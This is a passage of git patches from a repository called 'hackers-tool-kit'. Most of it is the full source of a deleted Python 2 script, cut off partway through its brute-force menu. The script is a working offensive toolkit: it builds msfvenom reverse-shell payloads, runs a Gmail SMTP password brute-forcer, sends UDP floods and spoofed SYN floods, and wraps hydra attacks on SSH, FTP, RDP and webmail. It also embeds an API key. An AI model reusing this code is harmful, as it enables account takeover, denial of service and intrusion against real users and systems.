hackers-tool-kit` * `python htk.py` From bb6bc5b69f52947f14a02d4ddc0961776b8c3684 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 30 Mar 2019 16:31:39 +0100 Subject: [PATCH 077/214] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index db7c33a..c38d9bf 100644 --- a/README.md +++ b/README.md @@ -38,10 +38,11 @@ the htksecure.py file will run the hackers-tool-kit with proxychains and other t this is where i will try to put the most recent updates -* changed some things in the myip and sysinfo options * updated arpspoof option * added a open new terminal option * added aircrack-ng automated option + +* added a source code grabber option From 76c31614a475b754368779bc111bfb3c16dc5171 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 1 Apr 2019 21:52:43 +0100 Subject: [PATCH 078/214] Delete htk.py --- htk.py | 2055 -------------------------------------------------------- 1 file changed, 2055 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 6fb48b5..0000000 --- a/htk.py +++ /dev/null @@ -1,2055 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " 